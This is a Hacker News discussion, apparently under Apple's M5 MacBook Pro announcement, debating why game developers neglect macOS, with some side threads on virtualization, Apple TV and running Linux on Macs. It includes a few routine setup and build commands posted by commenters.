          I mean, I worked in this space, and I'm telling you why many of the people I worked with weren't interested in supporting Apple. I'm happy to hear your theories if you don't like mine, though.

          • gjsman-1000 20 hours ago

            I think the past bit people, but unlike the PS4 transition or the consoles of the past (which were rarely backwards compatible), there wasn't enough cultural momentum to plow through it, leaving "don't support Apple" as a bit of an institutional memory at this point, even though the odds of another transition seem almost nonexistent. What would it even be? 128-bit? Back to x86? Notarization++? Metal 4 incompatible with Metal 1?

            • coldpie 20 hours ago

              Yeah, I buy that, so I think we are actually agreeing with each other. The very rough backwards support story Apple has had for the past decade, which I mentioned, has made people uninterested in supporting the platform, even if they're better about it now, as you claim (though I'm unconvinced about that personally, having worked on macOS software for more than a decade).

              > What would it even be? 128 bit? Back to x86? Notarization++? Metal 4 incompatible with Metal 1?

              Sure, I can think of lots of things. Every macOS update when I worked in this space broke something that we had to go fix. Code signature requirements change a bit in almost every release, not hard to imagine a 10-year-old game finally running afoul of some new requirement. I can easily see them removing old, unmaintained APIs. OpenGL is actively unmaintained and I would guess a massive attack vector, not hard to see that going away. Have you ever seen their controller force feedback APIs? Lol, they're so bad, it's a miracle they haven't removed those already.

            • bigyabai 18 hours ago

              > even though the odds of another transition seem almost nonexistent.

              You see, the existence of that "almost" already reflects less confidence than developers have in every game console, as well as in Linux and Windows.

        • jolux 20 hours ago

          > I've heard this argument, but it also doesn't pass the sniff test in 2025.

          I mean, it's at least partially true. I used to play BioShock Infinite on my MacBook in high school; there was a full port. Unfortunately it's 32-bit and doesn't run anymore, and there hasn't been a remaster yet.

    • littlecranky67 20 hours ago

      I don't buy it either, because Apple's GPTK works much like Proton: they have a DX12-to-Metal layer that works quite well, when it works. And GPTK is based on Wine, just as Proton is. It's more about other annoyances, like the lack of Steam support. There are patched versions of Steam circulating that run in GPTK (offline mode), but that's where everything gets finicky and brittle. It's mostly community effort, and I think gaming on Apple could be far better if they embraced the Proton approach they started with GPTK.
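
      For the curious, the basic GPTK flow is short; a rough sketch based on Apple's published Homebrew instructions (the prefix and Steam path here are illustrative):

          # Rosetta and x86_64 Homebrew are prerequisites; GPTK builds an x86_64 Wine.
          softwareupdate --install-rosetta
          brew tap apple/apple https://github.com/apple/homebrew-apple
          brew install apple/apple/game-porting-toolkit
          # Run a Windows executable inside a Wine prefix through the toolkit:
          gameportingtoolkit ~/my-game-prefix 'C:\Program Files (x86)\Steam\steam.exe'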

      • ldoughty 20 hours ago

        Apple collects no money from Steam sales, so they don't see a reason to support it.

        You don't buy Apple to use your computer the way you want to use it; you buy it to use it the way they tell you to. E.g. the "you're holding it wrong" fiasco.

        In some ways this is good for general consumers (and even developers: with limited configurations comes less unpredictability). However, it's generally bad for power users or "niche" users like Mac gamers.

        • littlecranky67 19 hours ago

          > Apple collects no money from Steam sales, so they don't see a reason to support it.

          That is true, but they are now in a position where their hardware is actually more affordable and powerful than its Windows/x86 counterpart, and Win 11 is a shitload of adware and an annoyance in itself layered on top of an OS. They could massively expand their hardware sales into the gaming sector.

          I'm eyeing a Framework Desktop with an AMD AI 395 APU for gaming (I'm happy with just 1080p@60) and looking at spending €2000, because I want a small form factor. Don't quote me on the benchmarks, but a Mac Mini with an M4 Pro is probably cheaper and more powerful for gaming, IF it had proper software support.

        • raw_anon_1111 19 hours ago

          Apple collects no money from Photoshop, Microsoft, or anything else that runs on the Mac besides the tiny minority of apps sold on the Mac App Store.

          Not to mention many subscription services on iOS that don’t allow you to subscribe through the App Store.

    • kllrnohj 19 hours ago

      PlayStation, Nintendo, and Xbox each have tens of millions of gamers. Meanwhile macOS makes up ~2% of Steam users, which is probably a pretty good proxy for the number of macOS gamers.

      Why would I do anything bespoke at all for such a tiny market? Much less an entirely unique GPU API?

      Apple refusing to support OpenGL and Vulkan absolutely hurt their gaming market. It increased the porting costs for a market that was already tiny.

      • littlecranky67 17 hours ago

        > Why would I do anything bespoke at all for such a tiny market?

        Because there is a huge potential here to increase market share.

  • SigmundA 21 hours ago

    Yep, I use Moonlight / Sunshine / Apollo to stream from my gaming PC, so I still use my Mac setup but get nearly perfect windows gaming with PC elsewhere in house.

    This has been by far the best setup until Apple can take gaming seriously, which may never happen.
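
    If anyone wants to try the same setup, the client side is a one-liner; the rest is installing Sunshine on the PC and approving a pairing PIN (cask name assumed current):

        # On the Mac (client):
        brew install --cask moonlight
        # On the gaming PC: install Sunshine, then approve Moonlight's pairing PIN
        # in Sunshine's web UI (https://localhost:47990 by default).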

ironman1478 18 hours ago

It's surprising to me that Macs aren't a more popular target for games. They're extremely capable machines, and they're console-like in that there isn't much variation in hardware, as opposed to traditional PC gaming. I would think it's easier to develop a game for a MacBook than for a Windows machine, where you never know what hardware setup the user will have.

  • shantara 18 hours ago

    The main roadblock for porting the games to Mac has never been the hardware, but Apple themselves. Their entire attitude is that they can do whatever they please with their platforms, and expect the developers to adjust to the changes, no matter how breaking. It’s a constant support treadmill, fixing the stuff that Apple broke in your previously perfectly functioning product after every update. If said fixing is even possible, like when Apple removed support for 32-bit binaries altogether, rendering 3/4 of macOS Steam libraries non-functional. This works for apps, but it‘s completely antithetical to the way game development processes on any other platform are structured. You finish a project, release it, do a patch cycle, and move on.

    And that’s not even talking about porting the game to either Metal or an absolutely ancient OpenGL version that could be removed with any upcoming OS version. A significant effort just to address a tiny market.

    • coffeeaddict1 18 hours ago

      > an absolutely ancient OpenGL version

      I still don't get this. Apple is a trillion-dollar company. How much would it cost to pay a couple of engineers to maintain an up-to-date version on top of Metal? Their current implementation is 4.1; it wouldn't cost them much to provide 4.6. Even Microsoft collaborated with Mesa to build a translation layer on top of DX12; Apple could do the same.

      • Schiendelman 9 hours ago

        It's because of Khronos' licensing of their IP; it seems like it's not compatible with Apple's legal team's interpretation of what they need.

      • astrange 16 hours ago

        They can't do Khronos things because they don't get along with Khronos. Same reason they stopped having NVidia GPUs forever ago.

      • mandarax8 16 hours ago

        Their current OpenGL 4.1 actually does run on top of Metal, making it even more blatantly obvious that they just don't want to.

    • astrange 18 hours ago

      > If said fixing is even possible, like when Apple removed support for 32-bit binaries altogether, rendering 3/4 of macOS Steam libraries non-functional.

      IIRC developers literally got 15 years of warning about that one.

      • ascagnel_ 17 hours ago

        Apple's mistake was allowing 32-bit stuff on Intel in the first place -- if they had delayed the migration ~6 months and passed on the Core Duo for Core 2 Duo, it would've negated the need to ever allow 32-bit code on x86.

      • bigyabai 18 hours ago

        IIRC that didn't convince many developers to revisit their software. I still have hard drives full of Pro Tools projects that open on Mojave but error on Catalina. Not to mention all the Steam games that launch fine on Windows/Linux but error on macOS...

        • astrange 17 hours ago

          Yes, game developers can't revisit old games because they throw out the dev environments when they're done, or their middleware can't get updated, etc.

          But it's not possible to keep maintaining 32-bit forever. That's twice the code and it can't support a bunch of important security features, modern ABIs, etc. It would be better to run old programs in a VM of an old OS with no network access.

          • Rohansi 14 hours ago

            Another big, non-technical reason is most games make most of their money around their release date. Therefore there is no financial benefit to updating the game to keep it working. Especially not on macOS where market share is small.

          • bigyabai 14 hours ago

            > But it's not possible to keep maintaining 32-bit forever.

            Apple had the money to support it, we both know that. They just didn't respect their Mac owners enough, Apple saw more value in making them dogfood iOS changes since that's where all the iOS devs are held captive. Security was never a realistic excuse considering how much real zombie code still exists in macOS.

            Speaking personally, I just wanted Apple to wait for WoW64 support to hit upstream. Their careless interruption of my Mac experience is why I ditched the ecosystem as a whole. If Apple cannot invest in making it a premium experience, I'll take my money elsewhere.

            • astrange 11 hours ago

              > Apple had the money to support it, we both know that.

              Not possible without forking the OS. No amount of money can make software development faster forever.

              https://en.wikipedia.org/wiki/The_Mythical_Man-Month

              Especially because Apple has a functional org structure, which means there is nearly no redundancy; there's only one expert in any given field, and that expert doesn't want to be stuck with old broken stuff. Nor does anyone want software updates to be twice as big as they otherwise would be, etc.

              > Security was never a realistic excuse considering how much real zombie code still exists in macOS.

              Code doesn't have security problems if nobody uses it. But nothing that's left behind is as bad as, say, QuickTime was.

              nb some old parts were replaced over time as the people maintaining them retired. In my experience all of these people were named Jim.

              • bigyabai 3 hours ago

                > there's only one expert in any given field and that expert doesn't want to be stuck with old broken stuff.

                Oh, my apologies to their expert. I had no idea that my workload was making their job harder, how inconsiderate of me. Anyone could make the mistake of assuming that the Mac supported these workloads when they use their Mac to run 32-bit plugins and games.

    • ryandrake 17 hours ago

      The company in general never really seemed that interested in Games, and that came right from Steve Jobs. John Carmack made a Facebook post[1] several years ago with some interesting insider insights about his advocacy of gaming to Steve Jobs, and the lukewarm response he received. They just never really seemed to be a priority at Apple.

      1: https://www.facebook.com/permalink.php?story_fbid=2146412825...

      • astrange 16 hours ago

        It's impossible to care about video games if you live in SV because the weather is too nice. You can feel the desire to do any indoor activity just fade away when you move there. This is somehow true even though there's absolutely nothing to do outside except take walks (or "go hiking" as locals call it) and go to that Egyptian museum run by a cult.

        Somehow Atari, EA and PlayStation are here despite this. I don't know how they did it.

        Meanwhile, Nintendo is successful because they're in Seattle where it's dark and rains all the time.

    • zarzavat 15 hours ago

      Gamedevs have not forgotten that Apple attempted to get Unreal Engine banned from all their platforms, rug-pulling every game built on top of it.

      It was only the intervention of Microsoft that managed to save Apple from their own tantrum.

  • lazypenguin 18 hours ago

    As far as I’ve seen, Apple is to blame here as they usually make it harder to target their platform and don’t really try to cooperate with the rest of the industry.

    As a game developer, I have to literally purchase Apple hardware to test rather than being able to conveniently download a VM

    • jjtheblunt 18 hours ago

      For games, how would you test in a VM, when games so explicitly want direct hardware access?

      I mean, I'm obviously misunderstanding something.

      • zulban 17 hours ago

        I run Linux and test my Windows releases on a VM. It works great.

        Sure, I'm not doing performance benchmarking and it's just smoke tests and basic user stories, but that's all that 98% of indie developers do for cross platform support.

        Apple has been intensely stupid as a platform to launch on, though I did do it eventually. I didn't like Apple before and now I like it even less.

      • lazypenguin 15 hours ago

        I develop a game that easily runs on much weaker hardware and runs fine in a VM; I'd say most simple 3D and 2D games would work fine in a VM on modern hardware.

        However, these days it's possible to pass hardware through to your VM, so I could pass a second GPU through to macOS... if it would let me run it as a guest.

      • Liquix 15 hours ago

        On Linux, KVM provides passthrough for GPUs and other hardware, so the VM "steals" the passed-through resources from the host and gets near-native performance.
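
        Roughly, the host hands the GPU to the vfio-pci stub at boot so the guest gets exclusive access. A sketch for an Intel host (the PCI IDs are illustrative):

            # 1. Find the GPU's vendor:device IDs:
            lspci -nn | grep -i nvidia
            # 2. Enable the IOMMU and reserve the GPU for vfio-pci via kernel
            #    parameters, e.g. in GRUB_CMDLINE_LINUX_DEFAULT:
            #      intel_iommu=on iommu=pt vfio-pci.ids=10de:2684,10de:22ba
            # 3. After rebooting, confirm vfio-pci (not nvidia/nouveau) owns the card:
            lspci -nnk -d 10de:2684 | grep 'Kernel driver in use'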

    • neogodless 18 hours ago

      I'm not a subject matter expert, but I do find it a little odd to read the second half of that. I'd expect, beyond development/debugging, there's certainly a phase of testing that requires hardware that matches your target system?

      Like, I get that if you develop for consoles, you probably use some kind of emulation on your development workstation, which is probably running Windows, especially for consoles like the Xbox One or newer and the PS4 or newer, which are essentially PCs. And then builds get passed off to a team that has the hardware.

      Is anyone developing games for Windows on Apple hardware? Do they run Parallels and call it a day? How is the gaming performance? If the answers to those 3 questions are "yes, yes, great", then Apple supports PC game development better than they support Apple game development?

      • lazypenguin 15 hours ago

        Basically you are correct: macOS has to be treated like a console in that way, except you get all the downsides of that development workflow with none of the upsides. The consoles provide excellent debugging and other tools for targeting their platform; can't say the same for macOS.

        For testing, I can do a large amount of testing in a VM for my game. Maybe not 100% and not full user testing but nothing beats running on the native hardware and alpha/beta with real users.

        Also, since I can pass through hardware to my VM I can get quite good performance by passing through a physical GPU for example. This is possible and quite straightforward to do on a Linux host. I'm not sure if it's possible using Parallels.

      • throwuxiytayq 18 hours ago

        > Like, I get if you develop for consoles, you probably use some kind of emulation on your development workstation

        I don’t think anybody does this. I haven’t heard about official emulators for any of the mainstream consoles. Emulation would be prohibitively slow.

        Developers usually test on dedicated devkits which are a version of the target console (often with slightly better specs as dev builds need more memory and run more slowly). This is annoying, slow and difficult, but at least you can get these dev kits, usually for a decent price, and there’s a point to trying to ship on those platforms. Meanwhile, nobody plays games on macs, and Apple is making zero effort to bring in the developers or the gamers. It’s a no-chicken-and-no-egg situation, really.

    • whatever1 18 hours ago

      You do it for Xbox and PlayStation and Nintendo.

    • cesarvarela 18 hours ago

      I'm sure you literally purchased Nvidia hardware for game development.

      • stronglikedan 17 hours ago

        A component is much cheaper than an entire dedicated system (which would of course contain a similar component).

        • cesarvarela 15 hours ago

          I don't know; a 5090 costs about 3k, a 5070 about 500. You can either buy a MacBook Pro or a Mac Mini. Seems reasonable.

  • jayd16 18 hours ago

    Mac dev sucks. You're forced to use macOS and Xcode (for the final build, anyway). You're not able to virtualize the build machines.

    Apple is actively hostile to how you would build for Linux or PC or console.
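
    For context, the Mac-only "final build" step is roughly the following, and none of it runs anywhere but macOS (the project, identity, and profile names are hypothetical):

        # Produce the release build on a Mac builder:
        xcodebuild -project MyGame.xcodeproj -scheme MyGame -configuration Release build
        # Sign, then notarize for distribution outside the App Store:
        codesign --force --sign "Developer ID Application: Example Corp" MyGame.app
        xcrun notarytool submit MyGame.zip --keychain-profile "notary-profile" --wait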

    • matthew-wegner 18 hours ago

      > You're not able to virtualize the build machines.

      Sure you can. And officially, too. Apple still ships a bunch of virtualization drivers in macOS itself. Have a look:

      /System/Library/Extensions/IONetworkingFamily.kext/Contents/PlugIns/AppleVmxnet3Ethernet.kext

      Whether or not you're using ESXi, or want to, is an entirely different question. But "you're not able to" is simply incorrect. I virtualize several build agents and have for years with no issues.
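
      A quick way to see one of those bundled guest drivers on a stock install (grep output quoted from memory):

          # VMware's paravirtual NIC driver ships inside the stock networking kext:
          ls /System/Library/Extensions/IONetworkingFamily.kext/Contents/PlugIns/ | grep -i vmx
          # -> AppleVmxnet3Ethernet.kext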

      macOS 26 is the last major version to support Intel, so once macOS 28 is the latest this will probably become impossible (macOS 26 should still be able to run Xcode 27, though the Intel removal may change the usual support for the previous year's OS).

      • GTP 18 hours ago

        > Apple still ships a bunch of virtualization drivers in macOS itself.

        I think OP means virtualizing on something that isn't Apple.

      • jayd16 18 hours ago

        Interesting. The last time I looked into it, you could only officially do this on Mac hardware (defeating the purpose).

        You can get Xcode building for ARM Macs on PC hardware with this?

    • nasseri 18 hours ago

      This is simply not the case. Every major game framework/engine targets Mac natively.

      If you are building your engine/game from scratch, you absolutely do not need to use Xcode

      • jayd16 18 hours ago

          Why don't you look through the Unreal and Unity docs and see if you can make a build without a Mac and Xcode.

        • nasseri 18 hours ago

          I think I misunderstood your point as “developing a game on Mac sucks”, vs “developing for Mac without a Mac sucks” which I absolutely can’t disagree with

        • nasseri 18 hours ago

          Yea you’re right I skipped over the part where you said the final build required it.

          Nonetheless that’s a small fraction of the time spent actually developing the game.

          • jayd16 18 hours ago

            Ideally, it's a continuous part of development because you're making daily (or more) builds and testing them.

            That makes it a continuous headache to keep your Mac builders up.

            It means you need to double your dev hardware costs or more, since you need a gaming PC to target your core audience while Macs handle the Mac bugs.

            It means your Mac build machines are special snowflakes, because you can't just use VMs.

            The list goes on and on of Mac being actively hostile to the process.

            Sure, Rider running on a Mac is pleasant, but that's not the issue.

    • coldtea 18 hours ago

      >Mac dev sucks. You're forced to use macos and xcode (for the final build anyway)

      Having to use xcode "for the final build" is irrelevant to the game development experience.

      • jayd16 18 hours ago

        If you're an indie with just PC hardware it sure as hell matters.

  • leshenka 18 hours ago

    I was very pleasantly surprised that Cyberpunk 2077 can maintain 60 FPS (14", M4 Pro, 24 GB RAM) with only occasional dips. Not at full resolution (around Full HD, actually), but at least without "frame generation." With frame generation turned on, it can output 90-100 FPS depending on the environment, but VSync is disabled, so dips become much more noticeable.

    It even has a "for this Mac" preset, which is good enough that you don't need to tinker with settings to get a decent experience.

    The game pauses, almost "freezes," when it's not visible on screen, which helps with battery (it can sit in the background without any noticeable impact on battery or temperature). Overall a far better experience than I expected.

  • jajuuka 14 hours ago

    Multiple solid reasons have been mentioned, from ones created by Apple to ones enforced in software by Apple. One that hasn't been mentioned is market share: the macOS market is just tiny and very limited, and it isn't growing. PC gaming isn't blowing up either, but the number of players is simply much higher.

    Ports to macOS have not done well, from what I've heard. Ports on PC, by contrast, do really well and have encouraged studios like Sony and Square Enix to invest more in PC ports, even long after the console versions have sold well. There just aren't many reasons to take on the tech debt and complexity of supporting the Mac as well.

    Even big publishers like Blizzard, who had been Mac devs for a long time, axed the dedicated Mac team and client and moved to a unified client. This has downsides, like Mac-specific issues: if those aren't critical, they get put in the pile with the rest of the bugs.

  • sosodev 18 hours ago

    It's easier to develop a game for a mac in some ways but you reach a tiny fraction of gamers that way.

    • hangonhn 18 hours ago

      I wonder how that might look once you factor in Apple TV devices. They're pretty weak devices now but future ones can come with M-class CPUs. That's a huge source of potential revenue for Apple.

      • amluto 18 hours ago

        The current Apple TV is, in many respects, unbelievably bad, and it has nothing to do with the CPU.

        Open up the YouTube app and try to navigate the UI. It’s okay but not really up to the Apple standard. Now try to enter text in the search bar. A nearby iPhone will helpfully offer to let you use it like a keyboard. You get a text field, and you can type, and keystrokes are slowly and not entirely reliably propagated to the TV, but text does not stay in sync. And after a few seconds, in the middle of typing, the TV will decide you’re done typing and move focus to a search result, and the phone won’t notice, and it gets completely desynchronized.

        • ascagnel_ 17 hours ago

          The YouTube app has never been good and never felt like a native app -- it's a wrapper around web tech.

          More importantly for games, though, is the awful storage architecture around the TV boxes. Games have to slice themselves up into 2GB storage chunks, which can be purged from the system whenever the game isn't actively running. The game has to be aware of missing chunks and download them on-demand.

          It makes open-world games nearly impossible, and it makes anything with significant storage requirements effectively impossible. As much as Apple likes to push the iOS port of Death Stranding, that game cannot run on tvOS as currently architected for that reason.

  • mavbo 18 hours ago

    I play a lot of World of Warcraft on my M3 MacBook Pro which has a native MacOS build. It's a CPU bottlenecked game with most users recommending the AMD X3D CPUs to achieve decent framerates in high end content. I'm able to run said content at high (7/10) graphics settings at 120fps with no audible fan noise for hours at a time on battery. It's been night and day compared to previous Windows machines.

  • Damogran6 18 hours ago

    There's a cost/value calculation that just doesn't work well... I have a Ryzen 9 / RTX 3070 PC ($2k over time) and my M4 Mini ($450) holds its own for most normal user stuff, sprinting ahead for specific tasks (video codecs), but the 6-year-old dedicated GPU on the PC annihilates the Mini at pushing pixels. You can spec an Apple machine that does better for gaming, but man, are you gonna pay for it, and it still won't keep up with current PC GPUs.

    Now... something like Minecraft or Subnautica? The M4 is fine, especially if you're not pushing 4K 240Hz.

    Apple has been pushing the gaming experience for years (iPhone 4S?), but it never REALLY seems to land, and when someone has a great gaming experience in a modern AAA game, they always seem to be using a $4500 Studio or similar.

  • LtdJorge 18 hours ago

    Metal is a very recent API compared to DirectX and OpenGL. Also, there are very, very few people on Mac, and even fewer who also play video games. There are almost no libraries and tooling built around Metal and the Mac SDKs, and the audience is tiny, so it doesn't make financial sense.

  • spogbiper 18 hours ago

    you have to release major titles for windows and console, because there are tons of customers using them.

    so a mac port, even if simple, is additional cost. there you have the classic chicken and egg problem. the cost doesn't seem to be justified by the number of potential sales, so major studios ignore the platform. and as long as they do, gamers ignore the platform

    i've seen it suggested that Apple could solve this standoff by funding the ports, maybe they have done this a few times. but Apple doesn't seem to care much about it

  • GTP 18 hours ago

    Until a few years ago, it was common for gamers to assemble their own PC, something you can't do with a Mac. Not sure if this is still common among gamers, though.

    • LarsDu88 16 hours ago

      The advent of silicon interposer technology will soon make modular memory and separate CPU/GPU obsolete, IMO.

      The communication bandwidth you can achieve by putting the CPU, GPU, and memory together at the factory is much higher than with separate components.

      Sad for enthusiasts, but practically inevitable.

  • viktorcode 16 hours ago

    Porting is not straightforward: you must switch to Metal, and you should adapt the rendering pipeline to Apple's tile-based deferred rendering.

  • ikamm 18 hours ago

    - have to build using Xcode on macOS

    - have to pay Apple to have your executable signed

    - poor Vulkan support

    The hardware has never been an issue, it's Apple's walled garden ecosystem.
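
    On the Vulkan point: what support exists is the MoltenVK translation layer on top of Metal, not a native driver. A minimal smoke test, assuming current Homebrew formula names and install paths:

        brew install molten-vk vulkan-loader vulkan-tools
        # Point the Vulkan loader at MoltenVK's ICD and list the device:
        export VK_ICD_FILENAMES="$(brew --prefix molten-vk)/share/vulkan/icd.d/MoltenVK_icd.json"
        vulkaninfo | head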

  • ProfessorZoom 18 hours ago

    I think it depends on how easy it is for a dev to deploy to Apple. The M1 was great at running Call of Duty in a Windows emulator; the iPhone can run the newest Resident Evil. Apple needs to do more to convince developers to deploy to the Mac.

  • croes 18 hours ago

    Doesn't macOS favor a 60Hz output? Gamers prefer much higher rates.

    And don't forget they made a VR headset without controllers.

    Apple doesn't care about games.

    • jsheard 17 hours ago

      > Doesn’t MacOS favor an 60Hz output?

      Kind of? It does support higher refresh rates, but the emphasis on "Retina" resolutions imposes a soft limit, because monitors that dense rarely support much more than 60Hz due to the sheer bandwidth requirements.
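
      Back-of-envelope numbers, assuming 10-bit color and ignoring blanking overhead:

          # 5120 x 2880 px x 120 Hz x 30 bits/px, in Gbit/s:
          echo "$(( 5120 * 2880 * 120 * 30 / 1000000000 )) Gbit/s"  # -> 53 Gbit/s
          # vs. ~32.4 Gbit/s raw for DisplayPort 1.4 HBR3 without DSC.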

      • 333c 11 hours ago

        The MacBook Pro has had a 120 Hz screen for nearly half a decade. And of course, external displays can support whatever resolution/refresh rate, regardless of the OS driving them.

  • yieldcrv 18 hours ago

    It's kind of a myth, though; the Mac has many flagship games and everything in between.

    If you identify as a "gamer" and are in those communities, you'll see people talking about things you can't natively play,

    but outside those niches you already have everything.

    And with microtransactions, Apple ecosystem users are the whales. Again, not something that people who identify as "gamers" want to admit being okay with, but those people are not the revenue base of game production.

    So I would say it's a missed opportunity for developers operating on antiquated calculations of macOS deployment.

    • bigyabai 15 hours ago

      > It's kind of a myth though

      It's kinda not. Here's a rough list of the 10 most-played games currently on PC: https://steamdb.info/charts/

      macOS is supported by one title (DOTA 2). Windows supports all 10, Linux (the free OS, just so we're clear) runs 7 of the games and has native ports of 5 of them. If you want to go argue to them about missed revenue opportunities then be my guest, but something tells me that DOTA 2 isn't being bankrolled by Mac owners.

      If you have any hard figures that demonstrate "antiquated calculations" then now is the time to fetch them for us. I'm somewhat skeptical.

vardump 20 hours ago

I guess I'm waiting for the M5 Max chip. Hopefully it's configurable with 256 GB RAM for LLMs and some VMs.

mattray0295 17 hours ago

They push these new generations out so quickly, and with crazy performance boosts. Impressive.

  • elric 14 hours ago

    Meanwhile, Intel seems to be doing a big bunch of nothing much. And AMD seems busy playing house with OpenAI to catch up to Nvidia on the GPU front.

    Now if only Apple would sell these for use outside of their walled garden.

RataNova 2 hours ago

"Over 4x GPU compute performance" sounds wild until you realize it's relative to the M4

brikym 8 hours ago

I just want them to fix all the MacOS liquid 'ass issues.

flakes 7 hours ago

What does “4x the peak GPU compute performance” mean here? No latency difference, but higher throughput? The footnote was not at all helpful

> Performance tests are conducted using specific computer systems and reflect the approximate performance of MacBook Pro.

h1fra 20 hours ago

I keep seeing all those crazy screenshots from games on Mac, and yet there are barely any big releases for the platform. I guess the hardware benefits a whole range of software, not just games, but it's still a pity.

  • tantalor 20 hours ago

    Because gaming on Mac actually looks bad in practice.

    https://news.ycombinator.com/item?id=44906305

    • qnpnp 18 hours ago

      This is easy to fix, not an explanation.

      Gaming on mac is indeed lacking, but that's really not the reason.

      • tantalor 16 hours ago

        It's a symptom of the deeper problem: Apple does not value game developers or the experience of users.

reacharavindh 19 hours ago

One thing that'd be a nice quality-of-life improvement in the MacBook (Air/Pro) is built-in 5G connectivity. I'd spring for that convenience: no more connecting to a hotspot and draining precious battery on my phone. I thought we were closer, given Apple has started making their own modems, but it's still a miss.

  • port3000 17 hours ago

    They want you to buy an Apple phone and pair it, so they sell more.

heystefan 21 hours ago

Is it me or did they use to avoid calling it "AI"?

  • simonw 21 hours ago

    Yeah, they rebranded it "Apple Intelligence" but this press release appears to be mostly using AI in the same (vague) way that the rest of the industry does.

    Also just noticed this:

    "And now with M5, the new 14-inch MacBook Pro and iPad Pro benefit from dramatically accelerated processing for AI-driven workflows, such as running diffusion models in apps like Draw Things, or running large language models locally using platforms like webAI."

    First time I've ever heard of webAI - I wonder how they got themselves that mention?

    • rgo 18 hours ago

      > First time I've ever heard of webAI - I wonder how they got themselves that mention?

      I wondered the same. Went to Crunchbase and found out Crunchbase is now fully paywalled (!); well, saw that coming... Anyway, hit the webAI blog; apparently they were showcased at the M4 MacBook Air event in 2024 [1] [2]:

      > During a demonstration, a 15-inch Air ran a webAI’s 22 billion parameter Companion large language model, rendered a 4K image using the Blender app, opened several productivity apps, and ran the game Wuthering Waves without any kind of slowdown.

      My guess is this was the best LLM use case Apple could dig up for their local-first AI strategy, and Apple Silicon is the best hardware use case webAI could dig up for theirs. For Apple, other examples would look too hacky or purely dev-oriented, or would depend on LLM behemoths from the US or China. I.e., "try your brand-new, performant M5 chip with LM Studio loaded with China's DeepSeek or Meta's Llama" is an Apple exec no-go.

      1. https://www.webai.com/blog/why-apples-m4-macbook-air-is-a-mi...

      2. https://finance.yahoo.com/news/apple-updates-bestselling-mac...

anteloper 14 hours ago

I can't find a single Moore's law chart that includes 2025 data (they all seem to cut off around 2020, actually).

Does anyone know if we're still on pace with Moore's law?

t1234s 15 hours ago

Any reason they don't have an Apple TV Pro with an M* chip targeted towards gaming?

  • quentindanjou 15 hours ago

    I think it's because there aren't enough games to justify integrating an M* chip.

    • boogieknite 14 hours ago

      probably right, but on the other hand Apple is willing to throw mountains of $ at TV+ productions just to get people onto their platform

      an economist could probably tell me why portioning some of that money toward a game-porting budget isn't worthwhile. Game Pass seems ripe to be undercut, too

  • NetMageSCW 10 hours ago

    Because the A* iPhone chip in the Apple TV should be more than enough for HD quality gaming?

ud0 2 hours ago

Yes, but where are the production desktop apps using on-device AI right now?

dmitshur 5 hours ago

It’ll be interesting to see how quickly this chip becomes available in the MacBook Air and Mac mini. So far those still have the previous M4 only.

If it doesn’t happen later this week, how long would the wait be? A few months? More?

  • operatingthetan 4 hours ago

    Apple seems to be following a regular schedule of new MacBook Pros in October and MacBook Airs in March. Could change, though!

drnick1 15 hours ago

A lot of Apple hardware is impressive on paper, but I will never buy a Mac that can't run Linux. I simply don't want to live in Apple's walled garden.

Then there's the whole ARM vs x86 issue. Even if a compatible Linux distro existed, I expect to run all kinds of software on my desktop rig, including games, and ARM is still a dead end for that. For laptops it's probably a sensible choice now, but we're still far from a truly free and usable ARM desktop.

  • littlecranky67 14 hours ago

    > A lot of Apple hardware is impressive on paper, but I will never buy a Mac that can't run Linux.

    They actually run Linux very well; have you ever tried Parallels or VMware Fusion? Parallels in particular ships with good software drivers for 2D/3D/video acceleration, suspend, and integration into the host OS. If that's not your thing, the new native container solution in Tahoe can run containers from Docker Hub and co.

    > I simply don't want to live in Apple's walled garden.

    And what walled garden would that be on macOS? You can install whatever you want, and Homebrew is at your fingertips with all the open and non-open software you could ask for.

    • mixmastamyk 13 hours ago

      Last I looked... extensive telemetry, and a sealed boot volume that makes turning it off impractical even if theoretically possible. There are other problems, of course.

      • TypesWillSaveUs 12 hours ago

        You can disable SIP and even disable immutable kernel text, load arbitrary drivers, enable/disable any feature, remove any system daemon, and use any restricted entitlement. The entire security model of macOS can be toggled off (csrutil from recoveryOS).
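
        For reference, the switch lives in recoveryOS rather than the running system; a sketch of the usual sequence:

            # From Terminal in recoveryOS:
            csrutil disable       # turn off System Integrity Protection
            # Back in the booted OS, verify the state:
            csrutil status
            # Restore the default security model later, again from recoveryOS:
            #   csrutil enable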

        • mixmastamyk 11 hours ago

          I'm aware of that. It's way too big a request just to make reasonable configuration changes, like shutting down daemons, etc.

          • Klonoar 11 hours ago

            No, it’s not that big a request. You literally have the capability. The average user does not need it.

            What is hard about this?

            • mixmastamyk 8 hours ago

              Stopping or disabling a service should be a command, as it is on Windows or Linux, not something configured on a read-only volume bundled with other security guarantees.

              It's pretty simple to keep these two things separate, as everywhere else in the present and history of the industry.
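
              To be fair, the command does exist; it just refuses to touch SIP-protected system daemons until SIP is disabled from recoveryOS (the daemon label here is illustrative):

                  sudo launchctl disable system/com.apple.tipsd
                  sudo launchctl bootout system/com.apple.tipsd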

              • Klonoar 8 hours ago

                Just because Windows/Linux do things one way doesn't mean the rest of the industry has to follow it. ;P

      • niek_pas 12 hours ago

        Just out of curiosity, are these philosophical objections or do you have a practical use for disabling code signing and messing with your boot volume?

        • mixmastamyk 11 hours ago

          I have practical use for disabling telemetry and other misfeatures. (Maybe you meant to reply to your sibling comment?)

        • littlecranky67 4 hours ago

          He's a religious Linux believer who will make you call him a GNU/Linux believer; no point in arguing, there's no interest in the argument.

    • kaladin-jasnah 6 hours ago

      From what I've checked, disabling SIP/AMFI/whatever it is now means I can't run iOS applications on macOS. The fact that there are restrictions on what I can run after doing that makes macOS more restrictive.

      Also, what if I want to run eBPF on my laptop on bare metal, to escape the hypercall overhead of VMs? Ultimately, a VM is not the same as a native experience. I might want to take advantage of acceleration for peripherals that isn't available unless I'm on bare metal.

      • littlecranky67 3 hours ago

        That point is often brought up, but it's kind of invalid, because you can't run iOS apps on your Linux or Windows installation either. Saying you're switching OSes over that use case is a spite reaction, not one based on reason.

        As in: "I can't run iOS apps on my macOS installation, so I'm going to use a different OS where I can't run them either."

        • davkan 16 minutes ago

          Well, it's just one less plus in the macOS column.

          I switched from a Pixel to an iPhone in large part because the Pixel removed the rear fingerprint reader, the headphone jack, and a UI shortcut I used multiple times a day. It's not that the iPhone had those things, but now neither did the Pixel.

    • cholantesh 9 hours ago

      How does Asahi fare these days? For home use I am fine with my Fedora machine but as a former (Tiger-SL era) Mac user who's never used macOS, I am somewhat curious about this.

      • andyferris 8 hours ago

